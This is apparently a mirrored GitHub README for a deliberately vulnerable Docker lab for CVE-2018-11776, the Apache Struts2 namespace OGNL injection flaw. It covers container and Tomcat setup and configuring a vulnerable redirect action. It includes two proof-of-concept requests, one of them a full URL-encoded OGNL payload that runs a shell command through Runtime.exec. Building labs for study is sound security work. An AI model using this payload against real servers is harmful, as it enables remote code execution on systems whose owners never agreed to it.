python>> CVE-2018-11776>> 返回
项目作者: bhdresh

项目描述 :
Vulnerable docker container for CVE-2018-11776
高级语言:
项目地址: git://github.com/bhdresh/CVE-2018-11776.git
创建时间: 2018-08-25T03:06:30Z
项目社区:https://github.com/bhdresh/CVE-2018-11776
开源协议:
下载


Vulnerable docker container for CVE-2018-11776

  1. # docker pull bhdresh/cve-2018-11776:1.0
  2. # docker run -dit -p <IP ADDRESS>:8080:8080 bhdresh/cve-2018-11776:1.0

PoC

PoC - 1
  1. Request : http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/${333+333}/help.action
  2. Result  : http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/666/help.action
PoC - 2
  1. Request : http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27touch /tmp/vulnerable%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/help.action
  2. Result  : This would create a file named 'vulnerable' in /tmp/ directory of docker

Steps to create vulnerable docker container

Create a Dockerfile
  1. FROM ubuntu:latest
  2. RUN apt-get update -y
  3. RUN apt-get upgrade -y
  4. RUN apt-get dist-upgrade -y
  5. RUN apt-get install default-jdk vim net-tools wget -y
  6. EXPOSE 8080
Build a docker
  1. # docker build -t cve-2018-11776 .
Start a docker
  1. # docker run --name cve-2018-11776 -p <IP ADDRESS>:8080:8080 -dit cve-2018-11776 /bin/bash
Login to docker
  1. # docker exec -it cve-2018-11776 /bin/bash
Make followinng changes inside docker
Set up Tomcat:
  1. # mkdir ~/sources
  2. # cd ~/sources
  3. # wget http://mirrors.ocf.berkeley.edu/apache/tomcat/tomcat-7/v7.0.90/bin/apache-tomcat-7.0.90.tar.gz
  4. # tar xvzf apache-tomcat-7.0.90.tar.gz
  5. # mv apache-tomcat-7.0.90 /opt/tomcat
Update bashrc with variables:
  1. # vim ~/.bashrc
  3. export JAVA_HOME=/usr/lib/jvm/default-java
  4. export CATALINA_HOME=/opt/tomcat
  6. # . ~/.bashrc
Add an admin to the Tomact gui:
  1. # vim /opt/tomcat/conf/tomcat-users.xml
  3. <user username="username" password="test-cve-2018-11776" roles="manager-gui,admin-gui" ></user>
Start Tomcat server
  1. # $CATALINA_HOME/bin/startup.sh
Upload and deploy a vulnerable Struts2 Showcase through tomcat UI
  1. http://<IP ADDRESS>:8080 (username:test-cve-2018-11776)
Restart Tomcat
  1. # $CATALINA_HOME/bin/shutdown.sh
  2. # $CATALINA_HOME/bin/startup.sh
Add a vulnerable redirection action without a namespace:
  1. # vim /opt/tomcat/webapps/struts2-showcase-2.3.14/WEB-INF/classes/struts.xml
  3.   <action name="help">
  4.               <result type="redirectAction">
  5.                       <param name="actionName">date.action</param>
  6.               </result>
  7.   </action>
  9. NOTE: By default, alwaysSelectFullNamespace should be set to True.
Restart Tomcat and check out the Struts2 Showcase page:
  1. # $CATALINA_HOME/bin/shutdown.sh
  2. # $CATALINA_HOME/bin/startup.sh
  4. http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/showcase.jsp

Author

@bhdresh

References

https://github.com/xfox64x/CVE-2018-11776

https://github.com/jas502n/St2-057